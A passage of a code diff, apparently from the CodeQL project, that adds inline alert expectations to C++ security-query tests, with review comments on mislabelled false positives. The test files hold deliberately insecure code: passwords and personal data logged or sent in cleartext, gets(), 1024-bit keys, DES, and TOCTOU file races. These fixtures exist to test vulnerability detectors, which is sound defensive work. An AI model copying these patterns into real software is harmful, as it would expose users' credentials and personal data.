").write(thePassword, strlen(thePassword)); + (mystream << "the password is: ").write(thePassword, strlen(thePassword)); // $ Alert[cpp/cleartext-storage-file] // GOOD: encrypt first char *encrypted = encrypt(thePassword); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test2.cpp index ff10fba761b3..b19118598d4c 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test2.cpp 
@@ -40,37 +40,37 @@ int getPasswordMaxChars(); void tests(FILE *log, myStruct &s) { - fprintf(log, "password = %s\n", s.password); // BAD - fprintf(log, "thepasswd = %s\n", s.thepasswd); // BAD - fprintf(log, "accountkey = %s\n", s.accountkey); // BAD + fprintf(log, "password = %s\n", s.password); // BAD // $ Alert[cpp/cleartext-storage-file] + fprintf(log, "thepasswd = %s\n", s.thepasswd); // BAD // $ Alert[cpp/cleartext-storage-file] + fprintf(log, "accountkey = %s\n", s.accountkey); // BAD // $ Alert[cpp/cleartext-storage-file] fprintf(log, "password_hash = %s\n", s.password_hash); // GOOD fprintf(log, "encrypted_passwd = %s\n", s.encrypted_passwd); // GOOD fprintf(log, "password_file = %s\n", s.password_file); // GOOD fprintf(log, "password_path = %s\n", s.password_path); // GOOD - fprintf(log, "passwd_config = %s\n", s.passwd_config); // DUBIOUS [REPORTED] + fprintf(log, "passwd_config = %s\n", s.passwd_config); // DUBIOUS [REPORTED] // $ Alert[cpp/cleartext-storage-file] fprintf(log, "num_passwords = %i\n", s.num_passwords); // GOOD fprintf(log, "password_tries = %i\n", *(s.password_tries)); // GOOD fprintf(log, "have_passwd = %i\n", s.have_passwd); // GOOD - fprintf(log, "widepassword = %ls\n", s.widepassword); // BAD - fprintf(log, "widepassword = %S\n", s.widepassword); // BAD + fprintf(log, "widepassword = %ls\n", s.widepassword); // BAD // $ Alert[cpp/cleartext-storage-file] + fprintf(log, "widepassword = %S\n", s.widepassword); // BAD // $ Alert[cpp/cleartext-storage-file] - fprintf(log, "getPassword() = %s\n", getPassword()); // BAD + fprintf(log, "getPassword() = %s\n", getPassword()); // BAD // $ Alert[cpp/cleartext-storage-file] fprintf(log, "getPasswordHash() = %s\n", getPasswordHash()); // GOOD fprintf(log, "getPasswordMaxChars() = %i\n", getPasswordMaxChars()); // GOOD { - char *cpy1 = s.password; + char *cpy1 = s.password; // $ Source[cpp/cleartext-storage-file] char *cpy2 = crypt(s.password); - fprintf(log, "cpy1 = %s\n", cpy1); // BAD + 
fprintf(log, "cpy1 = %s\n", cpy1); // BAD // $ Alert[cpp/cleartext-storage-file] fprintf(log, "cpy2 = %s\n", cpy2); // GOOD } { char buf[1024]; - strcpy(buf, s.password); - fprintf(log, "buf = %s\n", buf); // BAD + strcpy(buf, s.password); // $ Source[cpp/cleartext-storage-file] + fprintf(log, "buf = %s\n", buf); // BAD // $ Alert[cpp/cleartext-storage-file] strcpy(buf, s.password_hash); fprintf(log, "buf = %s\n", buf); // GOOD @@ -95,8 +95,8 @@ void tests(FILE *log, myStruct &s) { char buffer[1024]; - snprintf(buffer, 1024, "password = %s", s.password); - fprintf(log, "log: %s", buffer); // BAD + snprintf(buffer, 1024, "password = %s", s.password); // $ Source[cpp/cleartext-storage-file] + fprintf(log, "log: %s", buffer); // BAD // $ Alert[cpp/cleartext-storage-file] } } @@ -107,6 +107,6 @@ void test_gets() { char password[1024]; - gets(password); // BAD + gets(password); // BAD // $ Alert[cpp/cleartext-storage-buffer] } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test3.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test3.cpp index 35700d229e75..bd89d8b4d9c0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test3.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test3.cpp @@ -19,11 +19,11 @@ void test_send(const char *password1, const char *password2, const char *passwor { LogonUserA(val(), val(), password1, val(), val(), val()); // proof `password1` is plaintext - send(val(), password1, strlen(password1), val()); // BAD: `password1` is sent plaintext (certainly) + send(val(), password1, strlen(password1), val()); // BAD: `password1` is sent plaintext (certainly) // $ Alert[cpp/cleartext-transmission] } { - send(val(), password2, strlen(password2), val()); // BAD: `password2` is sent plaintext (probably) + send(val(), password2, strlen(password2), val()); // BAD: `password2` is sent plaintext (probably) // $ Alert[cpp/cleartext-transmission] } { 
@@ -44,7 +44,7 @@ void test_receive() { char password[256]; - recv(val(), password, 256, val()); // BAD: `password` is received plaintext (certainly) + recv(val(), password, 256, val()); // BAD: `password` is received plaintext (certainly) // $ Alert[cpp/cleartext-transmission] LogonUserA(val(), val(), password, val(), val(), val()); // (proof `password` is plaintext) } @@ -52,7 +52,7 @@ void test_receive() { char password[256]; - recv(val(), password, 256, val()); // BAD: `password` is received plaintext (probably) + recv(val(), password, 256, val()); // BAD: `password` is received plaintext (probably) // $ Alert[cpp/cleartext-transmission] } { @@ -71,16 +71,16 @@ void test_receive() void test_dataflow(const char *password1) { { - const char *ptr = password1; + const char *ptr = password1; // $ Source[cpp/cleartext-transmission] - send(val(), ptr, strlen(ptr), val()); // BAD: `password` is sent plaintext + send(val(), ptr, strlen(ptr), val()); // BAD: `password` is sent plaintext // $ Alert[cpp/cleartext-transmission] } { char password[256]; - char *ptr = password; + char *ptr = password; // $ Source[cpp/cleartext-transmission] - recv(val(), ptr, 256, val()); // BAD: `password` is received plaintext + recv(val(), ptr, 256, val()); // BAD: `password` is received plaintext // $ Alert[cpp/cleartext-transmission] } { @@ -98,7 +98,7 @@ void test_read() char password[256]; int fd = val(); - read(fd, password, 256); // BAD: `password` is received plaintext + read(fd, password, 256); // BAD: `password` is received plaintext // $ Alert[cpp/cleartext-transmission] } { @@ -111,7 +111,7 @@ void test_read() void my_recv(char *buffer, size_t bufferSize) { - recv(val(), buffer, bufferSize, val()); + recv(val(), buffer, bufferSize, val()); // $ Alert[cpp/cleartext-transmission] } const char *id(const char *buffer) 
@@ -123,7 +123,7 @@ char *global_password; char *get_global_str() { - return global_password; + return global_password; // $ Source[cpp/cleartext-transmission] } void test_interprocedural(const char *password1) @@ -131,19 +131,19 @@ void test_interprocedural(const char *password1) { char password[256]; - my_recv(password, 256); // BAD: `password` is received plaintext [detected in `my_recv`] + my_recv(password, 256); // BAD: `password` is received plaintext [detected in `my_recv`] // $ Source[cpp/cleartext-transmission] } { - const char *ptr = id(password1); + const char *ptr = id(password1); // $ Source[cpp/cleartext-transmission] - send(val(), ptr, strlen(ptr), val()); // BAD: `password1` is sent plaintext + send(val(), ptr, strlen(ptr), val()); // BAD: `password1` is sent plaintext // $ Alert[cpp/cleartext-transmission] } { char *data = get_global_str(); - send(val(), data, strlen(data), val()); // BAD: `global_password` is sent plaintext + send(val(), data, strlen(data), val()); // BAD: `global_password` is sent plaintext // $ Alert[cpp/cleartext-transmission] } } @@ -154,9 +154,9 @@ void test_taint(const char *password) { char buffer[16]; - strncpy(buffer, password, 16); + strncpy(buffer, password, 16); // $ Source[cpp/cleartext-transmission] buffer[15] = 0; - send(val(), buffer, 16, val()); // BAD: `password` is (partially) sent plaintext + send(val(), buffer, 16, val()); // BAD: `password` is (partially) sent plaintext // $ Alert[cpp/cleartext-transmission] } } @@ -225,7 +225,7 @@ int get_socket(int from); void test_more_stdio(const char *password) { send(get_socket(1), password, 128, val()); // GOOD: `getsocket(1)` is probably standard output - send(get_socket(val()), password, 128, val()); // BAD + send(get_socket(val()), password, 128, val()); // BAD // $ Alert[cpp/cleartext-transmission] } typedef struct {} FILE; 
@@ -238,7 +238,7 @@ void test_fgets(FILE *stream) { char password[128]; - fgets(password, 128, stream); // BAD + fgets(password, 128, stream); // BAD // $ Alert[cpp/cleartext-transmission] fgets(password, 128, STDIN_STREAM); // GOOD: `STDIN_STREAM` is probably standard input } @@ -267,9 +267,9 @@ void test_crypt_more() { char data[256], password[256]; - strcpy(data, password); // not proof of anything + strcpy(data, password); // not proof of anything // $ Source[cpp/cleartext-transmission] - send(val(), data, strlen(data), val()); // BAD: password is sent plaintext + send(val(), data, strlen(data), val()); // BAD: password is sent plaintext // $ Alert[cpp/cleartext-transmission] } } @@ -287,17 +287,17 @@ void target2(char *data) void target3(char *data) { - send(val(), data, strlen(data), val()); // BAD: data is a plaintext password + send(val(), data, strlen(data), val()); // BAD: data is a plaintext password // $ Alert[cpp/cleartext-transmission] } void target4(char *data) { - send(val(), data, strlen(data), val()); // BAD: data is a plaintext password + send(val(), data, strlen(data), val()); // BAD: data is a plaintext password // $ Alert[cpp/cleartext-transmission] } void target5(char *data) { - send(val(), data, strlen(data), val()); // BAD: from one source this is a plaintext password + send(val(), data, strlen(data), val()); // BAD: from one source this is a plaintext password // $ Alert[cpp/cleartext-transmission] } void target6(char *data) @@ -314,12 +314,12 @@ void test_multiple_sources_source(char *password1, char *password2) target2(password1); } else { target2(password1); - target3(password1); + target3(password1); // $ Source[cpp/cleartext-transmission] } if (cond()) { - char *data = password2; + char *data = password2; // $ Source[cpp/cleartext-transmission] target4(data); target5(data); 
@@ -338,7 +338,7 @@ void test_loops() { char password[256]; - recv(val(), password, 256, val()); // BAD: not encrypted + recv(val(), password, 256, val()); // BAD: not encrypted // $ Alert[cpp/cleartext-transmission] // ... } @@ -385,7 +385,7 @@ void test_more_clues() { char password[256]; - recv(val(), password, 256, val()); // BAD: not encrypted + recv(val(), password, 256, val()); // BAD: not encrypted // $ Alert[cpp/cleartext-transmission] } { @@ -411,13 +411,13 @@ void test_member_password() { packet p; - recv(val(), p.password, 256, val()); // BAD: not encrypted + recv(val(), p.password, 256, val()); // BAD: not encrypted // $ Alert[cpp/cleartext-transmission] } { packet p; - recv(val(), p.password, 256, val()); // GOOD: password is encrypted [FALSE POSITIVE] + recv(val(), p.password, 256, val()); // GOOD: password is encrypted [FALSE POSITIVE] // $ Alert[cpp/cleartext-transmission] decrypt_inplace(p.password); // proof that `password` was in fact encrypted } } @@ -428,7 +428,7 @@ void test_stdin_param(FILE *stream) { char password[128]; - fgets(password, 128, stream); // GOOD: from standard input (see call below) [FALSE POSITIVE] + fgets(password, 128, stream); // GOOD: from standard input (see call below) [FALSE POSITIVE] // $ Alert[cpp/cleartext-transmission] } void test_stdin() 
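Review bot: Two lines whose own comments read `GOOD ... [FALSE POSITIVE]` are annotated with a plain `$ Alert[cpp/cleartext-transmission]`, which records a known false positive as an expected true result. They are the second `recv(val(), p.password, 256, val())` in `test_member_password` and the `fgets(password, 128, stream)` in `test_stdin_param`. The inline-expectations form for this is `// $ SPURIOUS: Alert[cpp/cleartext-transmission]`, so a later precision fix in the query shows up as a resolved known issue and not as a lost detection. The same applies to the `[FALSE POSITIVE]` lines in `test2_11` of the CWE-367 `test2.cpp` and in `test7` of the CWE-416 `IteratorToExpiredContainer/test.cpp`, where the untagged form `// $ SPURIOUS: Alert` would fit. Both functions named here begin before their hunks.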
@@ -504,18 +504,18 @@ struct person_info void tests2(person_info *pi) { // direct cases - send(val(), pi->social_security_number, strlen(pi->social_security_number), val()); // BAD - send(val(), pi->socialSecurityNo, strlen(pi->socialSecurityNo), val()); // BAD - send(val(), pi->homePostCode, strlen(pi->homePostCode), val()); // BAD - send(val(), pi->my_zip_code, strlen(pi->my_zip_code), val()); // BAD - send(val(), pi->telephone, strlen(pi->telephone), val()); // BAD - send(val(), pi->mobile_phone_number, strlen(pi->mobile_phone_number), val()); // BAD - send(val(), pi->email, strlen(pi->email), val()); // BAD - send(val(), pi->my_credit_card_number, strlen(pi->my_credit_card_number), val()); // BAD - send(val(), pi->my_bank_account_no, strlen(pi->my_bank_account_no), val()); // BAD - send(val(), pi->employerName, strlen(pi->employerName), val()); // BAD - send(val(), pi->medical_info, strlen(pi->medical_info), val()); // BAD - send(val(), pi->license_key, strlen(pi->license_key), val()); // BAD + send(val(), pi->social_security_number, strlen(pi->social_security_number), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->socialSecurityNo, strlen(pi->socialSecurityNo), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->homePostCode, strlen(pi->homePostCode), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->my_zip_code, strlen(pi->my_zip_code), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->telephone, strlen(pi->telephone), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->mobile_phone_number, strlen(pi->mobile_phone_number), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->email, strlen(pi->email), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->my_credit_card_number, strlen(pi->my_credit_card_number), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->my_bank_account_no, 
strlen(pi->my_bank_account_no), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->employerName, strlen(pi->employerName), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->medical_info, strlen(pi->medical_info), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->license_key, strlen(pi->license_key), val()); // BAD // $ Alert[cpp/cleartext-transmission] send(val(), pi->license_key_hash, strlen(pi->license_key_hash), val()); // GOOD send(val(), pi->my_zip_file, strlen(pi->my_zip_file), val()); // GOOD @@ -523,14 +523,14 @@ void tests2(person_info *pi) { char buffer[1024]; - snprintf(buffer, 1024, "lat = %f\n", pi->my_latitude); - send(val(), buffer, strlen(buffer), val()); // BAD + snprintf(buffer, 1024, "lat = %f\n", pi->my_latitude); // $ Source[cpp/cleartext-transmission] + send(val(), buffer, strlen(buffer), val()); // BAD // $ Alert[cpp/cleartext-transmission] } { char buffer[1024]; - snprintf(buffer, 1024, "long = %f\n", pi->home_longitude); - send(val(), buffer, strlen(buffer), val()); // BAD + snprintf(buffer, 1024, "long = %f\n", pi->home_longitude); // $ Source[cpp/cleartext-transmission] + send(val(), buffer, strlen(buffer), val()); // BAD // $ Alert[cpp/cleartext-transmission] } { char buffer[1024]; @@ -548,15 +548,15 @@ void tests2(person_info *pi) { char buffer[1024]; - snprintf(buffer, 1024, "salary = %s\n", pi->salaryString); - send(val(), buffer, strlen(buffer), val()); // BAD + snprintf(buffer, 1024, "salary = %s\n", pi->salaryString); // $ Source[cpp/cleartext-transmission] + send(val(), buffer, strlen(buffer), val()); // BAD // $ Alert[cpp/cleartext-transmission] } { char buffer[1024]; - char *sal = pi->salaryString; + char *sal = pi->salaryString; // $ Source[cpp/cleartext-transmission] snprintf(buffer, 1024, "salary = %s\n", sal); - send(val(), buffer, strlen(buffer), val()); // BAD + send(val(), buffer, strlen(buffer), val()); // BAD // $ Alert[cpp/cleartext-transmission] } } 
@@ -568,14 +568,14 @@ void tests3() { const char *str; - str = get_home_phone(); - send(val(), str, strlen(str), val()); // BAD + str = get_home_phone(); // $ Source[cpp/cleartext-transmission] + send(val(), str, strlen(str), val()); // BAD // $ Alert[cpp/cleartext-transmission] str = get_home(); send(val(), str, strlen(str), val()); // GOOD (probably not personal info) - str = get_home_address(); - send(val(), str, strlen(str), val()); // BAD + str = get_home_address(); // $ Source[cpp/cleartext-transmission] + send(val(), str, strlen(str), val()); // BAD // $ Alert[cpp/cleartext-transmission] } int fscanf(FILE* stream, const char* format, ... ); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected index 971cdb4f3ff3..00185bff5faf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected 
@@ -1,3 +1,10 @@ +#select +| test.cpp:24:21:24:40 | http://example.com | test.cpp:24:21:24:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:28:10:28:29 | http://example.com | test.cpp:28:10:28:29 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:35:23:35:42 | http://example.com | test.cpp:35:23:35:42 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:36:26:36:45 | http://example.com | test.cpp:36:26:36:45 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:46:18:46:26 | http:// | test.cpp:46:18:46:26 | *http:// | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:110:21:110:40 | http://example.com | test.cpp:110:21:110:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | edges | test.cpp:11:26:11:28 | *url | test.cpp:15:30:15:32 | *url | provenance | | | test.cpp:24:13:24:17 | **url_g | test.cpp:38:11:38:15 | *url_g | provenance | | 
@@ -41,10 +48,3 @@ nodes | test.cpp:116:3:116:37 | *... = ... | semmle.label | *... = ... | | test.cpp:121:11:121:13 | *ptr | semmle.label | *ptr | subpaths -#select -| test.cpp:24:21:24:40 | http://example.com | test.cpp:24:21:24:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:28:10:28:29 | http://example.com | test.cpp:28:10:28:29 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:35:23:35:42 | http://example.com | test.cpp:35:23:35:42 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:36:26:36:45 | http://example.com | test.cpp:36:26:36:45 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:46:18:46:26 | http:// | test.cpp:46:18:46:26 | *http:// | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:110:21:110:40 | http://example.com | test.cpp:110:21:110:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.qlref index c9c917ad0456..5a18a73768b9 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-319/UseOfHttp.ql \ No newline at end of file +query: Security/CWE/CWE-319/UseOfHttp.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/test.cpp index 573e021979d7..ba977d434481 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/test.cpp 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/test.cpp @@ -12,7 +12,7 @@ void openUrl(const char *url) { // ... - host myHost = gethostbyname(url); + host myHost = gethostbyname(url); // $ Sink // ... } @@ -21,19 +21,19 @@ void doNothing(char *url) { } -const char *url_g = "http://example.com"; // BAD +const char *url_g = "http://example.com"; // BAD // $ Alert void test() { - openUrl("http://example.com"); // BAD + openUrl("http://example.com"); // BAD // $ Alert openUrl("https://example.com"); // GOOD (https) openUrl("http://localhost/example"); // GOOD (localhost) openUrl("https://localhost/example"); // GOOD (https, localhost) doNothing("http://example.com"); // GOOD (URL not used) { - const char *url_l = "http://example.com"; // BAD - const char *urls[] = { "http://example.com" }; // BAD + const char *url_l = "http://example.com"; // BAD // $ Alert + const char *urls[] = { "http://example.com" }; // BAD // $ Alert openUrl(url_g); openUrl(url_l); @@ -43,7 +43,7 @@ void test() { char buffer[1024]; - strcpy(buffer, "http://"); // BAD + strcpy(buffer, "http://"); // BAD // $ Alert strcat(buffer, "example.com"); openUrl(buffer); @@ -107,7 +107,7 @@ void test4(char *url) void test5() { - char *url_string = "http://example.com"; // BAD + char *url_string = "http://example.com"; // BAD // $ Alert char *ptr; ptr = strstr(url_string, "https://"); // GOOD (https) diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected index ca20f65bec72..4f1a66d4cdf5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected 
@@ -1,10 +1,10 @@ +#select +| test.cpp:34:5:34:38 | call to EVP_PKEY_CTX_set_dsa_paramgen_bits | test.cpp:34:45:34:48 | 1024 | test.cpp:34:45:34:48 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:34:45:34:48 | 1024 | 1024 | +| test.cpp:35:5:35:42 | call to EVP_PKEY_CTX_set_dh_paramgen_prime_len | test.cpp:35:49:35:52 | 1024 | test.cpp:35:49:35:52 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:35:49:35:52 | 1024 | 1024 | +| test.cpp:37:5:37:36 | call to EVP_PKEY_CTX_set_rsa_keygen_bits | test.cpp:37:43:37:46 | 1024 | test.cpp:37:43:37:46 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:37:43:37:46 | 1024 | 1024 | edges nodes | test.cpp:34:45:34:48 | 1024 | semmle.label | 1024 | | test.cpp:35:49:35:52 | 1024 | semmle.label | 1024 | | test.cpp:37:43:37:46 | 1024 | semmle.label | 1024 | subpaths -#select -| test.cpp:34:5:34:38 | call to EVP_PKEY_CTX_set_dsa_paramgen_bits | test.cpp:34:45:34:48 | 1024 | test.cpp:34:45:34:48 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:34:45:34:48 | 1024 | 1024 | -| test.cpp:35:5:35:42 | call to EVP_PKEY_CTX_set_dh_paramgen_prime_len | test.cpp:35:49:35:52 | 1024 | test.cpp:35:49:35:52 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:35:49:35:52 | 1024 | 1024 | -| test.cpp:37:5:37:36 | call to EVP_PKEY_CTX_set_rsa_keygen_bits | test.cpp:37:43:37:46 | 1024 | test.cpp:37:43:37:46 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:37:43:37:46 | 1024 | 1024 | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.qlref index e869f87150a8..790ce8b27187 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.qlref 
@@ -1 +1,2 @@ -Security/CWE/CWE-326/InsufficientKeySize.ql \ No newline at end of file +query: Security/CWE/CWE-326/InsufficientKeySize.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-326/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-326/test.cpp index 18780fc05c0f..5e606f46baf4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-326/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-326/test.cpp @@ -31,8 +31,8 @@ void test1(EVP_PKEY_CTX *ctx) { EVP_PKEY_CTX_set_rsa_keygen_bits(ctx, 2048); // low key sizes - EVP_PKEY_CTX_set_dsa_paramgen_bits(ctx, 1024); - EVP_PKEY_CTX_set_dh_paramgen_prime_len(ctx, 1024); + EVP_PKEY_CTX_set_dsa_paramgen_bits(ctx, 1024); // $ Alert + EVP_PKEY_CTX_set_dh_paramgen_prime_len(ctx, 1024); // $ Alert // RSA sets bits per-key rather than with parameters - EVP_PKEY_CTX_set_rsa_keygen_bits(ctx, 1024); + EVP_PKEY_CTX_set_rsa_keygen_bits(ctx, 1024); // $ Alert } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-327/BrokenCryptoAlgorithm.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-327/BrokenCryptoAlgorithm.qlref index 8424dee1a9b6..ead42dd0386b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-327/BrokenCryptoAlgorithm.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-327/BrokenCryptoAlgorithm.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-327/BrokenCryptoAlgorithm.ql \ No newline at end of file +query: Security/CWE/CWE-327/BrokenCryptoAlgorithm.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-327/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-327/test.cpp index 91af0f7eede2..2ab9fc8457d8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-327/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-327/test.cpp 
@@ -35,7 +35,7 @@ void my_implementation6(const char *str); void test_macros(void *data, size_t amount, const char *str) { - ENCRYPT_WITH_DES(data, amount); // BAD + ENCRYPT_WITH_DES(data, amount); // BAD // $ Alert ENCRYPT_WITH_RC2(data, amount); // BAD ENCRYPT_WITH_AES(data, amount); // GOOD (good algorithm) ENCRYPT_WITH_3DES(data, amount); // BAD diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-327/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-327/test2.cpp index 95fc532c842d..9c8eb0933ed2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-327/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-327/test2.cpp @@ -46,7 +46,7 @@ void encrypt_bad(char *data, size_t amount, keytype key, int algo) { case ALGO_DES: { - my_des_implementation(data, amount, key); // BAD + my_des_implementation(data, amount, key); // BAD // $ Alert } break; case ALGO_AES: diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/TOCTOUFilesystemRace.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/TOCTOUFilesystemRace.qlref index c7d2e9c45f4b..cbced86ff2e2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/TOCTOUFilesystemRace.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/TOCTOUFilesystemRace.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-367/TOCTOUFilesystemRace.ql \ No newline at end of file +query: Security/CWE/CWE-367/TOCTOUFilesystemRace.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/test2.cpp index 96425debc7c2..4fb08a116b94 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/test2.cpp @@ -66,7 +66,7 @@ void test2_1(const char *path) if (stat(path, &buf)) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert } // ... 
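Review bot: In `test_macros` only `ENCRYPT_WITH_DES(data, amount)` gains `// $ Alert`, while the context lines `ENCRYPT_WITH_RC2(data, amount); // BAD` and `ENCRYPT_WITH_3DES(data, amount); // BAD` keep their BAD comment with no expectation. `BrokenCryptoAlgorithm.qlref` now runs `postprocess: utils/test/InlineExpectationsTestQuery.ql`, so each BAD line should state what the query does. That means `// $ Alert` if the line is reported, or `// $ MISSING: Alert` if the weak algorithm is currently not detected, which keeps the gap visible in the test. Whether these two lines are reported cannot be told from this hunk, and the function body continues past it.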
@@ -80,7 +80,7 @@ void test2_2(const char *path) stat(path, &buf); if (buf.foo > 0) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert } // ... @@ -95,7 +95,7 @@ void test2_3(const char *path) stat(path, buf_ptr); if (buf_ptr->foo > 0) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert } // ... @@ -112,7 +112,7 @@ void test2_4(const char *path) stat(path, &buf); if (stat_condition(&buf)) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert } // ... @@ -127,7 +127,7 @@ void test2_5(const char *path) stat(path, buf_ptr); if (stat_condition(buf_ptr)) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert } // ... @@ -154,7 +154,7 @@ void test2_7(const char *path, int arg) if (stat(path, &buf)) { - f = open(path, arg); // BAD + f = open(path, arg); // BAD // $ Alert } // ... @@ -167,7 +167,7 @@ void test2_8(const char *path, int arg) if (lstat(path, &buf)) { - f = open(path, arg); // BAD + f = open(path, arg); // BAD // $ Alert } // ... @@ -206,7 +206,7 @@ void test2_11(const char *path, int arg) if (stat(path, &buf)) { - f = open(path, arg); // GOOD (here stat is just a redundant check that the file exists / path is valid, confirmed by the return value of open) [FALSE POSITIVE] + f = open(path, arg); // GOOD (here stat is just a redundant check that the file exists / path is valid, confirmed by the return value of open) [FALSE POSITIVE] // $ Alert if (f == -1) { // handle error @@ -225,7 +225,7 @@ void test2_12(const char *path, int arg) { if (buf.foo == 11) // check a property of the file { - f = open(path, arg); // BAD + f = open(path, arg); // BAD // $ Alert if (f == -1) { // handle error @@ -246,7 +246,7 @@ void test2_13(const char *path, int arg) return; } - f = fopen(path, "wt"); 